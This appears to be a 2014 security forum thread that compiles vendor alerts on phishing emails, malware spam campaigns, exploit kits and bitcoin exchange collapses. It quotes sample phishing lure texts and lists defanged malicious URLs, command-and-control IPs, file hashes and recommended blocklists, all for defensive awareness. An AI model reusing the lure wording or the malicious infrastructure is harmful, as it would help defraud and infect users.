If you’d like to check your credentials, we’ve created a web tool that will allow you to enter your e-mail address to see whether it was included in the data cache. The tool will only send an e-mail to the address you input... You can find the tool here*..."
* https://www3.trustwave.com/support/labs/check-compromised-email.asp

** http://thehackernews.com/2013/12/Sheep-Marketplace-scam-Bitcoin-stolen-Silk-Road.html

:fear: :mad:

AplusWebMaster
2014-02-25, 17:04
FYI...

Fake Westpac Bill Payment - Phish
- http://www.hoax-slayer.com/westpac-bill-payment-processed-phishing-scam.shtml
Feb 25, 2014 - "Message supposedly sent by Australian bank Westpac, notifies recipients that a payment to a biller has been successfully processed and invites them to click a link to view transaction details. Westpac did -not- send the email. The message is a phishing scam that attempts to lure Westpac customers into visiting a fraudulent website and providing their account login details. Criminals will use the stolen information to hijack Westpac bank accounts belonging to their victims.
Example:
> http://www.hoax-slayer.com/images/westpac-payment-processed-phishing-2014-1.jpg
This email, which was supposedly sent by large Australian bank Westpac, informs recipients that a payment to a biller has been successfully processed. The email includes details of the bill payment and invites recipients to follow a link to view more information about the transaction. The message includes the Westpac logo... It is a -phishing- scam that was created with the goal of tricking recipients into giving their Westpac account login details to cybercriminals. Some Westpac customers who receive the bogus notification may be panicked into clicking the link in the mistaken belief that their accounts have been compromised and used to conduct fraudulent transactions in their names... the criminals responsible for the phishing campaign will collect the submitted login credentials. The criminals can use the stolen credentials to access their victims' bank accounts, transfer funds and commit further fraudulent transactions. If you receive one of these emails, do -not- click any links -or- open any attachments that it contains. Westpac has published information about phishing scams and how to report them on its website*..."
* http://www.westpac.com.au/security/fraud-and-scams/online-fraud/
___

Fake British Airways e-ticket email - malware ...
- http://www.welivesecurity.com/2014/02/25/british-airways-e-ticket-malware-attack-launched-via-email/
Feb 25, 2014 - "If you have received an unexpected email, claiming to come from British Airways, about an upcoming flight that you haven’t booked – please be on your guard. Online criminals are attempting to infect innocent users’ computers with a variant of the malicious Win32/Spy.Zbot.AAU trojan, by disguising their attack as an e-ticket from the airline. To maximise the potential number of victims, the attackers have spammed out messages widely from compromised computers.
> http://www.welivesecurity.com/wp-content/uploads/2014/02/ba-malware-email.jpeg
... Of course, although the email claims to come from British Airways – it is nothing of the sort. In a classic example of social engineering, criminals are hoping that email recipients will worry that their credit card has been fraudulently used to purchase an air ticket, and click on links inside the email to find out more. However, if user download the supposed e-ticket, and launch its contents they will be infecting themselves with a trojan horse that can spy on their computer activity and give malicious hackers third-party access to their data... the malware has been spread via malicious links after cybercriminals forged email headers to make their messages look like they really came from British Airways’s customer service department. But it’s equally possible for attackers to spread their malware via email attachments, or for other disguises to be deployed if those behind the spam blitz believe that they have a greater chance of success. Remember to always be suspicious of clicking on links in unsolicited emails, and the social engineering tricks that are frequently used to lure computer users into making unwise decisions..."
___

WhatsApp desktop client doesn’t exist, used in Spam Attack anyway
- http://blog.trendmicro.com/trendlabs-security-intelligence/whatsapp-desktop-client-doesnt-exist-used-in-spam-attack-anyway/
Feb 25, 2014 - "The popular messaging application WhatsApp recently made headlines when it was acquired by Facebook... Cybercriminals didn’t waste much time to capitalize on this bit of news: barely a week after the official announcement, we saw a spam attack that claims that a desktop version of the popular mobile app is now being tested.
Screenshot of spammed message:
> http://about-threats.trendmicro.com/resources/images/02232014_facebookspam.jpg
... The message also provides a download link to this version, which is detected as TROJ_BANLOAD.YZV, which is commonly used to download banking malware. (This behavior is the same, whether on PCs or mobile devices). That is the case here; TSPY_BANKER.YZV is downloaded onto the system. This BANKER variant retrieves user names and passwords stored in the system, which poses a security risk for online accounts accessed on the affected system. The use of BANKER malware, coupled with a Portuguese message, indicates that the intended targets are users in Brazil. Feedback from the Smart Protection Network indicates that more than 80 percent of users who have accessed the malicious site do come from Brazil. Although the volume of this spam run is relatively low, it is currently increasing. One of our spam sources reported that samples of this run accounted for up to 3% of all mail seen by that particular source, which indicates a potential spam outbreak. We strongly advise users to be careful of this or similar messages; WhatsApp does -not- currently have a Windows or Mac client, so all messages that claim one exists can be considered -scams- ..."
___

Bitcoin exchange Mt. Gox disappears...
- http://www.reuters.com/article/2014/02/25/us-mtgox-website-idUSBREA1O07920140225
Feb 25, 2014 - "Mt. Gox, once the world's biggest bitcoin exchange, looked to have essentially disappeared on Tuesday, with its website down, its founder unaccounted for and a Tokyo office empty bar a handful of protesters saying they had lost money investing in the virtual currency. The digital marketplace operator, which began as a venue for trading cards, had surged to the top of the bitcoin world, but critics - from rival exchanges to burned investors - said Mt. Gox had long been lax over its security. It was not clear what has become of the exchange, which this month halted withdrawals indefinitely after detecting "unusual activity." A global bitcoin organization referred to the exchange's "exit," while angry investors questioned whether it was still solvent..."
- http://www.wired.com/wiredenterprise/2014/02/bitcoins-mt-gox-implodes/
___

Developers attack code bypasses MS EMET tool
- http://arstechnica.com/security/2014/02/new-attack-completely-bypasses-microsoft-zero-day-protection-app/
Feb 24, 2014 - "Researchers have developed attack code that completely bypasses Microsoft's zero-day prevention software, an impressive feat that suggests criminal hackers are able to do the same thing when exploiting vulnerabilities that allow them to surreptitiously install malware. The exploit code, which was developed by researchers from security firm Bromium Labs, bypasses each of the many protections included in the freely available EMET, which is short for Enhanced Mitigation Experience Toolkit... The Bromium exploit included an example of a real-world attack that was able to circumvent techniques designed to mitigate the damage malicious code can do when targeting security bugs included in third-party applications... The researchers privately informed security personnel at Microsoft before going public with their findings; the software giant plans to credit the research when releasing the upcoming version 5 of EMET..."

:fear::fear: :mad:

AplusWebMaster
2014-02-26, 16:53
FYI...

Fake AMEX email - phish ...
- http://www.hoax-slayer.com/amex-personal-security-key-phishing-scam.shtml
Feb 26, 2014 - "Email claiming to be from American Express instructs recipients to visit a website and create a Personal Security Key (PSK) as an account authentication measure. The email is -not- from American Express. Links in the email open a fraudulent website designed to emulate a genuine American Express webpage. The fake website asks users to provide credit card details and other information. The criminals behind the scam will use the stolen data to commit credit card fraud and hijack online accounts. If this message comes your way, do -not- click on any links -or- open any attachments that it contains.
> http://www.hoax-slayer.com/images/amex-psk-phishing-1.jpg
According to this email, which purports to be from American Express, users can increase their account security by having a Personal Security Key (PSK). The message invites recipients to click a link to create their PSK. The email is professionally presented and includes seemingly legitimate subscription and copyright information. At first glance, the message may seem like a genuine American Express notification, especially since it supposedly provides information to help customers protect themselves from fraud. American Express does offer customers a PSK system as one of several authentication measures. However, this email is not from American Express. Ironically, considering its content, the email is itself a scam designed to defraud customers. Clicking any of the links in the fake message will take users to a bogus website that asks for their credit card information. Like the email itself, the bogus website looks professional and has been built so that it closely emulates a genuine American Express page. The information provided on the fake website can be collected by scammers and used to commit credit card fraud and identity theft... scammers are likely to create new scam sites and send out more of the scam emails. Phishing scammers continually target American Express and other credit card providers. As such scams go, this is a quite sophisticated attempt. Because of the way it is presented, the scam may catch out even more experienced users. American Express will -never- send customers unsolicited emails that request them to provide their card details or other sensitive personal information by clicking a link. The American Express website* includes information about phishing and how to report scam emails."
* https://www.americanexpress.com/us/content/fraud-protection-center/identity-theft.html
___

Android - 98% of all mobile malware targeted this platform...
- https://www.securelist.com/en/analysis/204792326/Mobile_Malware_Evolution_2013#05
24 Feb 2014 - "... Android remains a prime target for -malicious- attacks. 98.05% of all malware detected in 2013 targeted this platform, confirming both the popularity of this mobile OS and the vulnerability of its architecture..."
Charted: https://www.securelist.com/en/images/vlill/mobile_treats_2013_02.png

- http://www.theinquirer.net/inquirer/news/2331127/android-is-target-for-98-percent-of-all-mobile-malware
Feb 26 2014 - "... the number of new malicious programs in 2013 -doubled- to over 100,000... The bulk of attacks, 40 percent, target people in Russia. The UK ranks fifth, with three percent of victims. Germany, which lurks just below the UK, is apparently rather susceptible to a premium charge SMS takeover attack... that is unlikely to last for long: given cybercriminals' keen interest in consumer bank accounts, the activity of mobile banking Trojans is expected to grow in other countries in 2014..."
___

Eviction Notice Spam
- http://threattrack.tumblr.com/post/77923990772/eviction-notice-spam
Feb 26, 2014 - "Subjects Seen:
Eviction Notice
Typical e-mail details:
Urgent notice of eviction,
We have to inform you about the eviction proceedings against
you and the decision of the bank to foreclose on your property.
As a trespasser you need to move out until 20 March 2014
and leave the property empty of your belongings and any trash.
Please contact our office without delay to make arrangements for a move out.
If you do not do this, you could be simply locked out of your home.
Detailed bank statement as well as our contact information
can be found in the attachment to this notice.
Real estate agency,
Helen Tailor

Malicious File Name and MD5:
Notice_of_eviction_id65697RE.zip (26660A4FEB6D13BA67BFDBEF486A36FD)
Urgent_notice_of_eviction.exe (1B7E61B48866A523BF5618F266AC5600)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/f8be68f04b21ceab153a52b83b677b8e/tumblr_inline_n1m96h2f2Y1r6pupn.png

Tagged: Eviction Notice, Kuluoz

:fear::fear: :mad:

AplusWebMaster
2014-02-27, 12:57
FYI...

Fake Amazon SPAM / 213.152.26.150
- http://blog.dynamoo.com/2014/02/amazoncom-important-for-your-online.html
27 Feb 2014 - "This fake Amazon spam leads to something bad.
Date: Wed, 26 Feb 2014 13:09:55 -0400 [02/26/14 12:09:55 EST]
From: "Amazon.com" [t1na@ msn .com]
Subject: Important For Your Online Account Access .
Your Account Has Been Held
Dear Customer ,
We take you to note that your account has been suspended for protection , Where the password was entered more than once .
In order to protect ,account has been suspended .Please update your Account Information To verify the account...
Thanks for Update at Amazon .com...

Screenshot: https://lh3.ggpht.com/-I0pRhOGLLtA/Uw8FkamDDfI/AAAAAAAACp8/4wyArLqOV5o/s1600/amazon2.png

In the samples that I have seen the link in the email goes to either [donotclick]exivenca .com/support.php or [donotclick]vicorpseguridad .com/support.php both of which are currently -down- but were both legitimate sites hosted on 213.152.26.150 (Neo Telecoms, France). The fact that these sites are down could be because the host is dealing with the problem, however I would expect to see this same email template being used again in the future, so take care.."
___

Fake Royal Mail SPAM
- http://blog.dynamoo.com/2014/02/royal-mail-shipping-advisory-spam.html
27 Feb 2014 - "This -fake- Royal Mail spam has a malicious payload:
From: Royal Mail noreply@ royalmail .com
Date: 27 February 2014 14:50
Subject: Royal Mail Shipping Advisory, Thu, 27 Feb 2014
Royal Mail Group Shipment Advisory
The following 1 piece(s) have been sent via Royal Mail on Thu, 27 Feb 2014 15:47:17 +0530, REF# GB36187692IE ...

Screenshot: https://lh3.ggpht.com/-Uwr252R1CT4/Uw9U1uFE1NI/AAAAAAAACq8/qAUAaBpcaYI/s1600/royalmail.png

This is a ThreeScripts attack, the link in the email goes to:
[donotclick]wagesforinterns .com/concern/index.html
and it then runs one or more of the following scripts:
[donotclick]billigast-el .nu/margarita/garlicky.js
[donotclick]ftp.arearealestate .com/telecasted/earners.js
[donotclick]tattitude .co .uk/combines/cartooning.js
in this case the payload site is at
[donotclick]northwesternfoods .com/sg3oyoe0v2
which is hosted on 23.239.12.68 (Linode, US) along with a bunch of hijacked GoDaddy sites... The payload appears to be an Angler Exploit Kit (see this example*).
Recommended blocklist:
23.239.12.68
billigast-el .nu
ftp.arearealestate .com
tattitude .co .uk
n2ocompanies .com
northerningredients .com
northwesternfoods .com
oziama .com
oziama .net "
* http://urlquery.net/report.php?id=9660606

:fear::fear:

AplusWebMaster
2014-02-28, 13:36
FYI...

IE10 0-day exploited in widespread Drive-by Downloads
- http://www.symantec.com/connect/blogs/internet-explorer-10-zero-day-vulnerability-exploited-widespread-drive-downloads
Updated: 27 Feb 2014 - "... We’ve observed trends suggesting that attacks targeting this vulnerability are no longer confined to advanced persistent threats (APT) — the zero-day attacks are expanding to attack average Internet users as well. We refer to these attacks as drive-by downloads. This is not a surprising result, as the vulnerability’s exploit code received a lot of exposure, allowing anyone to acquire the code and re-use it for their own purposes. Our internal telemetry shows a big uptick in attempted zero-day attacks. The attacks started to increase dramatically from February 22, targeting users in many parts of the world. Our telemetry shows -both- targeted attacks and drive-by downloads in the mix.
Attacks targeting CVE-2014-0322 around the world
> http://www.symantec.com/connect/sites/default/files/users/user-2551621/IE%2010%20zero%20day%201.png
... websites either were modified to host the exploit code for the Internet Explorer zero-day vulnerability or were updated with the insertion of an iframe that redirects the browser to another compromised site hosting the exploit code. If the attack is successful, the exploit drops a banking Trojan that steals login details from certain banks... Microsoft has yet to provide a security update to patch the affected vulnerability. However, the company has offered the following solutions to help users protect their computers from exploits that take advantage of this vulnerability:
- Upgrade to Internet Explorer 11
- Install the Microsoft Fix it workaround solution:
> http://support.microsoft.com/kb/2934088#FixItForMe "
___

Fake Netflix Phish leads to Fake MS Tech Support
- http://blog.malwarebytes.org/fraud-scam/2014/02/netflix-phishing-scam-leads-to-fake-microsoft-tech-support/
Feb 28, 2014 - "... came across what I first thought was a typical phishing scam targeting Netflix:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/02/signin.png
Until I realized it wasn’t, or at least that there was something more to it. Of course it stole my credentials:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/02/phish.png
But it also displayed a message saying my account had been suspended:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/02/suspended.png
In order to fix this issue, you are urged to call “Netflix” at a 1-800 number. If you do a bit of a search you will find out this is -not- the official hotline, so this warranted a deeper investigation. Once I called the number, the rogue support representative had me download a “NetFlix Support Software”:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/02/software.png
This is nothing else but the popular remote login program TeamViewer:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/02/downloads.png
After remotely connecting to my PC, the scammer told me that my Netflix account had been suspended because of illegal activity. This was supposedly due to hackers who had infiltrated my computer as he went on to show me the scan results from their own ‘Foreign IP Tracer’, a -fraudulent- custom-made Windows batch script... According to him, there was only one thing to do: To let a Microsoft Certified Technician fix my computer. He drafted a quick invoice and was kind enough to give me a $50 Netflix coupon (fake of course) before transferring me to another technician... During our conversation, the scammers were not idle. They were going through my personal files and uploading those that looked interesting to them, such as ‘banking 2013.doc‘... Another peculiar thing is when they asked me for a picture ID and a photo of my credit card since the Internet is not secure and they needed proof of my identity. I could not produce one, therefore they activated my webcam so that I could show said cards to them onto their screen... This is where it ended as my camera was disabled by default. The scammers were located in India, information gathered from the TeamViewer logfile... -never- let anyone take remote control of your computer unless you absolutely trust them. This scam took place in a controlled environment that had been set up specifically for that purpose..."

:fear::fear:

AplusWebMaster
2014-03-01, 14:16
FYI...

The ThreatCon is currently at Level 2: Elevated
- http://www.symantec.com/security_response/threatconlearn.jsp
Mar 2, 2014 - "On February 19, 2014, Microsoft released a security advisory confirming a limited, targeted attacks that attempt to exploit a vulnerability in Internet Explorer 9 and 10. The exploit is now being used in mass attacks. Customers are advised to update to Internet Explorer 11 or apply the Microsoft Fix it* solution described in the Microsoft Security Advisory. A security patch has yet to be released.
Microsoft Security Advisory (2934088) Vulnerability in Internet Explorer Could Allow Remote Code Execution"
* http://support.microsoft.com/kb/2934088#FixItForMe

> http://www.netmarketshare.com/browser-market-share.aspx?qprid=0&qpcustomd=0
Feb 2014 - IE: 58%
___

Fake Companies House SPAM
- http://blog.dynamoo.com/2014/02/companies-house-fw-case-6569670-spam.html
28 Feb 2014 - "This -fake- Companies House spam leads to malware:
From: Companieshouse.gov.uk [web-filing@companies-house .gov .uk]
Date: 28 February 2014 12:55
Subject: Spam FW: Case - 6569670
A company complaint was submitted to Companies House website.
The submission number is 6569670
For more details please click : https ://companieshouse .gov .uk/Case?=6569670
Please quote this number in any communications with Companies House.
All Web Filed documents are available to view / download for 10 days after their
original submission. However it is not possible to view copies of accounts that
were downloaded as templates.
Companies House Executive Agency may use information it holds to prevent
and detect fraud. We may also share such information, for the same purpose,
with other organisations that handle public funds.
If you have any queries please contact the Companies House Contact Centre ...

Screenshot: https://lh3.ggpht.com/-_WHfOqxcvGU/UxCsGiLDt5I/AAAAAAAACro/R7Ysn-oY3CA/s1600/companies-house-4.png

The link in the email goes to:
[donotclick]economysquareshoppingcenter .com/izmir/index.html
in turn this runs one or more of the following scripts:
[donotclick]homedecorgifts .biz/outfitted/mascara.js
[donotclick]www.coffeemachinestorent .co.uk/disusing/boas.js
[donotclick]citystant .com/trails/pulitzer.js
[donotclick]rccol.pytalhost .de/turban/cupped.js
which in turn leads to a payload site at:
[donotclick]digitec-brasil .com.br/javachecker.php?create=3019&void-cat=4467&first-desk=9002
According to this URLquery report*, the payload site has some sort of Java exploit.
Recommended blocklist:
digitec-brasil .com.br
homedecorgifts .biz
coffeemachinestorent .co.uk
citystant .com
rccol.pytalhost .de "
* http://urlquery.net/report.php?id=9706278
___

Fake Urgent eviction notification - Asprox...
- http://stopmalvertising.com/spam-scams/urgent-eviction-notification-a-deeper-dive-into-the-asprox-ecosystem.html
Feb 28, 2014 - "The latest Asprox / Kuluoz spam template consists of an unsolicited email appearing to be from ppmrental .com. Prospectors Property Management is a Real Estate Agency located in Morgan Hill, California. The emails arrive with the subject line "Urgent eviction notification". The spammed out message notifies the recipient that as a trespasser they need to move out from their property before the 21 March 2014 and leave the property empty of their belongings and trash. The addressee must contact the Real Estate without delay in order to make arrangements to move out. Failure to do so could result in being locked out of the house. A detailed bank statement as well as the Real Estate's contact information can be found in the attachment. The executable file inside the ZIP archive poses as a Microsoft Word Document. This is one of the main reasons why you should never trust a file by its icon. Make sure that Windows Explorer is set to show file extensions and always pay attention to the file extension instead. The payload, Urgent_notice_of_eviction.exe will start up an instance of svchost.exe before accessing the internet. A copy of the executable will be copied under a random name to the %User Profile%\Local Settings\Application Data folder. A small downloader - bqoqusgj.exe in our analysis - will be fetched from the C&C together with 3 other files:
vbxghrke - 66.5 KB (68,161 bytes)
kqrbfxel - 12.0 KB (12,326 bytes)
ihxqgwcu.exe - 140 KB (143,360 bytes)
A new start up entry will be created for ihxqgwcu.exe so that the program starts each time Windows starts but the executable isn’t launched yet. In meanwhile bqoqusgj.exe will download two files posing as Updates for the Flash Player: updateflashplayer_9e26d2b2.exe (libs5.8/jquery directory) and UpdateFlashPlayer_266a0199.exe (libs5.8/ajax directory).
> http://stopmalvertising.com/research/images/asprox-infogram1.jpg
... Updateflashplayer_9e26d2b2.exe will instantly shutdown and reboot the computer. A series of error messages will appear upon reboot as the malicous binary has deleted several critical registry keys belonging to Antivirus / Firewall / HIPS applications...The Asprox ad fraud binary also makes sure that the computer can’t boot in Safe Mode by deleting the corresponding registry entries. As seen below, booting the computer in safe mode results in a blue screen.
> http://stopmalvertising.com/research/images/asprox-infogram2.jpg
... For an in-depth analysis of Asprox / Kuluoz please refer to: Analysis of Asprox and its New Encryption Scheme*... Email:
> http://stopmalvertising.com/research/images/asprox-infogram10.jpg
... IP Details
46.161.41.154
37.221.168.50
109.163.239.243 ...
14.54.223.133
37.193.48.182 (504)
37.115.155.128
72.227.178.35
90.154.249.71
91.225.93.237
100.2.223.97
109.226.203.101
176.212.145.163
188.129.241.164
213.231.48.242 ..."
(More detail at the stopmalvertising URL above.)
* http://stopmalvertising.com/malware-reports/analysis-of-asprox-and-its-new-encryption-scheme.html

- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=33147
2014 Mar 03

:mad: :fear:

AplusWebMaster
2014-03-03, 13:43
FYI...

Malware sites to block ...
- http://blog.dynamoo.com/2014/03/malware-sites-to-block-2314.html
2 Mar 2014 - "These domains and IPs are all connected with this gang*, some of it appears to be involved in -malware- distribution, -fraud- or other illegal activities. I recommend that you -block- these IPs and domains. Note that some of the IPs listed below are compromised nameservers (marked [ns]) which look like they are insufficiently well locked down. There is a plain list of IPs at the end for copy-and-pasting..."
(Long list at the URL above.)
* http://blog.dynamoo.com/2014/03/seekcousacom-seekconzcom-fake-job-offer.html
2 Mar 2014
___

Rising use of Malicious Java Code ...
- https://www.trusteer.com/blog/rising-use-of-malicious-java-code-for-enterprise-infiltration-0
Mar 3, 2014 - "... exploit kits such as the Blackhole and Cool exploit kit were found to be using unpatched Java vulnerabilities... to install malware..."
Extract from the 2014 IBM X-Force Threat Intelligence Quarterly report
Exploited apps - Dec 2013
> https://www.trusteer.com/sites/default/files/ScreenShot609.png
Java vulnerabilities - 2010-2013
> https://www.trusteer.com/sites/default/files/ScreenShot610.png

:mad: :fear:

AplusWebMaster
2014-03-04, 14:16
FYI...

Phone Phishing, Data Breaches, and Banking Scams
- http://blog.trendmicro.com/trendlabs-security-intelligence/phone-phishing-data-breaches-and-banking-scams/
Mar 4, 2014 - "... I received a rather unusual call that claimed to be from National Australia Bank (NAB), one of the four largest banks in Australia. The caller had my complete name and my address. They claimed that they had flagged a suspicious transaction from my account to an Alex Smith in New Zealand to the tune of 700 Australian dollars. They needed my NAB number to confirm if the transaction was legitimate. There was just one problem with this seemingly plausible call: I wasn’t an NAB customer. I offered to call them back – and when I did so, they simply hung up on me. These sorts of calls are not the only threats that arrive via phone – for example, fake “support” calls that are supposedly from Microsoft* that offer to remove malware from user PCs are sadly commonplace. To most users who simply go about their daily lives, these calls can sound quite convincing and can cause a lot of problems... How did they get that all that information? We don’t know. However, it’s very possible that somebody somewhere had a data breach. They may not have known about it, or they may have decided that since the information “wasn’t critical” – say, they didn’t have my credit card or banking credentials – that it was harmless. However, now you can see how seemingly “harmless” information can be used to carry out real fraud. Since last year, we’ve been pointing out the huge gains in banking malware**. Just as support scams can be thought of as a “real-world” equivalent to ransomware and fake antivirus, so can these sort of phishing calls be the equivalent of these banking malware threats..."
* http://www.microsoft.com/security/online-privacy/msname.aspx

** http://blog.trendmicro.com/trendlabs-security-intelligence/2013-security-roundup/
___

Twitter sends password reset emails by mistake, admits it wasn't hacked
- http://www.theinquirer.net/inquirer/news/2332034/twitter-sends-password-reset-emails-by-mistake-promises-it-hasnt-been-hacked
Mar 04 2014 - "... Twitter sent a number of password reset emails on Monday evening due to a system error. The firm contacted users with the sort of messages usually seen when attackers are taking over accounts. Twitter's email has been shared on the microblogging website, of course, and picked up by the Recode website. The missive presented itself as one of those 'you've been hacked' emails, and informed users about their scorched logins. "Twitter believes that your account may have been compromised by a website or service not associated with Twitter," it said. "We've reset your password to prevent accessing your account." Users took to Twitter to fret about the email, and a search on "Twitter hack" turns up a range of panicked missives and messages of thanks to Twitter for its speedy intervention. Later though, in a statement to Recode, the firm admitted that it had been the victim of nothing more than a system error. "We unintentionally sent some password reset notices tonight due to a system error," it said. "We apologise to the affected users for the inconvenience." Users could not be blamed to worrying about the phantom attack, as we have already seen a large number of security breaches this year already..."
___

Orange MMS Message Spam
- http://threattrack.tumblr.com/post/78565844188/orange-mms-message-spam
Mar 4, 2014 - "Subjects Seen:
MMS message from: +447974******
Typical e-mail details:
You have received MMS message from: +447974778589
You can find the contents of the message in the attachment
If you have any questions regarding this automated message please contact Orange Customer Support

Malicious File Name and MD5:
MMS_C0BFB6C0B8.zip (3A123E39BDCAC7ED1127206502C1598C)
MMS_87436598.exe (10F21C0F2C3C587A509590FA467F8775)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/d6ffde2f5ab5fd87acf75fa8676729f2/tumblr_inline_n1xe68fhjQ1r6pupn.png

Tagged: Orange, Androm
___

Bitcoin bank Flexcoin shuts down after theft
- http://www.reuters.com/article/2014/03/04/us-bitcoin-flexcoin-idUSBREA2329B20140304
Mar 4, 2014 - "Bitcoin bank Flexcoin said on Tuesday it was closing down after it lost bitcoins worth about $600,000 to a hacker attack. Flexcoin said in a message posted on its website that all 896 bitcoins stored online were stolen on Sunday. "As Flexcoin does not have the resources, assets, or otherwise to come back from this loss, we are closing our doors immediately," the company said. [ http://www.flexcoin.com/ ] Alberta, Canada-based Flexcoin, which is working with law enforcement agencies to trace the source of the hack, said it would return bitcoins stored offline, or in "cold storage", to users. Cold storage coins are held in computers not connected to the Internet and therefore cannot be hacked... Bitcoin is a digital currency that, unlike conventional money, is bought and sold on a peer-to-peer network independent of central control. Its value soared last year, and the total worth of bitcoins minted is now about $7 billion..."

:fear: :sad:

AplusWebMaster
2014-03-05, 13:59
FYI...

Fake PayPal 'Cancel Payment' Phishing Scam
- http://www.hoax-slayer.com/paypal-cancel-payment-phishing-scam.shtml
Mar 5, 2014 - "Email purporting to be from PayPal claims that the recipient has sent a payment to a specified merchant and offers instructions for cancelling the payment if required... The email is a phishing scam designed to trick recipients into divulging their PayPal account login details and a large amount of personal and financial information. All of the information supplied will be sent to online criminals and used to commit financial fraud and identity theft. The merchant or seller specified in the messages may vary in different incarnations of the scam. If you receive one of these bogus emails, do not click on any links or open any attachments that it contains...
> http://www.hoax-slayer.com/images/paypal-cancel-payment-phishing-2014-1.jpg
.
> http://www.hoax-slayer.com/images/paypal-cancel-payment-phishing-2014-2.jpg
... Those who do click will be taken to a -bogus- website and asked to supply their PayPal email address and password on a fake login box. After logging in, they will be presented with the following web form, which asks for a large amount of personal and financial information:
> http://www.hoax-slayer.com/images/paypal-cancel-payment-phishing-2014-3.jpg
... All of the information supplied can be harvested by criminals and used to hijack the compromised PayPal accounts, commit credit card fraud and steal the identities of victims... If a PayPal phishing scam email hits your inbox, you can submit it to the company for analysis via the email address listed on the company's phishing information page*. A quick rule of thumb. PayPal emails will ALWAYS address you by your first and last names or business name. They will never use generic greetings such as 'Dear customer'. Nor will they omit the greeting..."
* https://www.paypal.com/us/webapps/helpcenter/helphub/article/?articleID=FAQ2331&m=SRE

:mad: :fear:

AplusWebMaster
2014-03-06, 23:54
FYI...

Deceptive ads expose users to PUA ...
- http://www.webroot.com/blog/2014/03/06/deceptive-ads-expose-users-pua-installbrainpc-performer-pua-potentially-unwanted-application/
Mar 6, 2014 - "Deceptive ads continue to represent the primary distribution vector for the vast majority of Potentially Unwanted Applications (PUAs) that we track. Primarily relying on ‘visual social engineering’ tactics, gullible end users fall victims to these privacy-violating applications, largely due to the fact that they instantaneously agree to the terms in the End User’s Agreement presented to them. We’ve recently spotted yet another variant of the InstallBrain family of Potentially Unwanted Applications (PUA’s), tricking users into installing a bogus PC performance boosting application... actionable intelligence on the domains/IPs and related privacy-violating MD5s known to have shared the same infrastructure as the initial PUA profiled in this post...
Sample screenshot of the landing page:
> https://www.webroot.com/blog/wp-content/uploads/2014/03/Potentially_Unwanted_Software_PUA_InstallBrain_PC_Performer.png
... Sample detection rate for PurpleTech Software Inc’s PC Performer:
MD5: f85a9d94027c2d44f33c153b22a86473* ... Once executed, the sample phones back to:
hxxp:// inststats-1582571262.us-east-1.elb.amazonaws .com – 23.21.180.138
hxxp:// api.ibario .com – 50.22.175.81
hxxp:// 107.20.142.228 /service/stats.php?sv=1
hxxp:// 174.36.241.169 /events
Domain name reconnaissance:
api.ibario .com – 50.22.175.81; 96.45.82.133; 96.45.82.197; 96.45.82.69; 96.45.82.5
thepcperformer .com – 96.45.82.5; 96.45.82.69; 96.45.82.133; 96.45.82.197 ...
... responded to the same C&C server (23.21.180.138) ...
... phoned back to the same IP (50.22.175.81)..."
* https://www.virustotal.com/en/file/124348611e216d1ccf01a06261ceb2a5b8fbee0c305e54d274a133fd35c22619/analysis/1394030288/

:mad: :fear:

AplusWebMaster
2014-03-07, 22:46
FYI...

Fake TurboTax: E-file successful email
- http://security.intuit.com/alert.php?a=101
3/7/14 - " People are receiving fake emails with the title "TurboTax: E-file Successful." Below is a copy of the email people are receiving:
> http://security.intuit.com/images/ttsuccessful.jpg
___
This is the end of the -fake- email.
Steps to Take Now
Do not open any attachment or click any links in the email...
Delete the email."
___

Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Bank Transaction Statement Email Messages - 2014 Mar 07
Email Messages with Malicious Attachments - 2014 Mar 07
Fake Product Invoice Notification Email Messages - 2014 Mar 07
Fake Account Payment Information Email Messages - 2014 Mar 07
Fake Product Order Notification Email Messages - 2014 Mar 07
Fake Failed Delivery Notification Email Messages - 2014 Mar 07
Fake Fax Message Delivery Email Messages - 2014 Mar 07
Fake Fax Delivery Email Messages - 2014 Mar 07
Fake Payment Transaction Notification Email Messages - 2014 Mar 06...
(Links / more info at the cisco URL above.)
___

Friday (Spam) Roundup
- http://blog.malwarebytes.org/online-security/2014/03/a-friday-spam-roundup/
Mar 7, 2014 - "... spam for the weekend?
1) Bitcoin spam: http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/03/bitspam1.jpg
“Buy and sell Bitcoins!
Find the best places online to buy / sell Bitcoin currency”
The link just takes clickers to what appears to be a parked domain with sponsored links. In other words, delete / avoid.
2) Skype Team Direct Messages: http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/03/bitspam2.jpg
“Direct message from Skype Team
Skype
Direct Message
View Message
Respectfully,
Skype Service”
3) Pharmacy msgs: http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/03/bitspam3.jpg
4) TV spamblog spam [-not- email based]: ... when scammers try to take advantage of a service like Google Docs they’re going phishing. I saw this and thought it was at least a little unusual – Google Docs being used to spam a cookie-cutter spamblog promising free TV shows. I’m sure you’ve seen those spam posts across the net...
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/03/bitspam5.jpg "

:mad: :fear:

AplusWebMaster
2014-03-10, 11:40
FYI...

Q4-2013 McAfee Threat Report
- https://net-security.org/malware_news.php?id=2727
Mar 10, 2014 - "... By the end of 2013, McAfee Labs saw the number of malicious signed binaries in our database -triple- to more than 8 million suspicious binaries. In the fourth quarter alone, McAfee Labs found more than 2.3 million new malicious signed applications, a 52 percent increase from the previous quarter. The practice of code signing software validates the identity of the developer who produced the code and ensures the code has not been tampered with since the issue of its digital certificate...
> http://www.net-security.org/images/articles/mcafee032014.jpg
... Additional findings:
- Mobile malware. McAfee Labs collected 2.47 million new mobile samples in 2013, with 744,000 in the fourth quarter alone. Our mobile malware zoo of unique samples grew by an astounding 197 percent from the end of 2012.
- Ransomware. The volume of new ransomware samples rose by 1 million new samples for the year, doubling in number from Q4 2012 to Q4 2013.
- Suspicious URLs. McAfee Labs recorded a 70 percent increase in the number of suspect URLs in 2013.
- Malware proliferation. In 2013, McAfee Labs found 200 new malware samples every minute, or more than three new threats every second.
